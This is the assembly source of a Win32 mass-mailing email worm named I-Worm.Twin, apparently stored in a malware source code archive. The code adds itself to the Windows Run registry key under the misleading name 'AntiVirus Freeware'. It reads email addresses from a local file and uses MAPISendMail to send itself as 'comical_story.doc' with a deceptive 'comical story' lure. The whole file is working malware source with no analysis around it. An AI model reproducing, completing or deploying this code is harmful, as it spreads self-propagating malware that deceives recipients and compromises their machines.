MalwareSourceCode/Win32/InternetWorm/I-Worm.Twin.asm
2020-10-16 23:26:21 +02:00

198 lines
2.6 KiB
NASM

comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes
Action : See yourself. It's not complex.
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
@pushsz "C:\twin.vbs"
api DeleteFileA
push 50
push offset pathname
api GetWindowsDirectoryA
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
orig_worm db 50 dup (0)
pathname db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
subject db "A comical story for you.",0
body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
db 9,"Best Regards. You friend.",0
filename db "comical_story.doc",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?
end start
end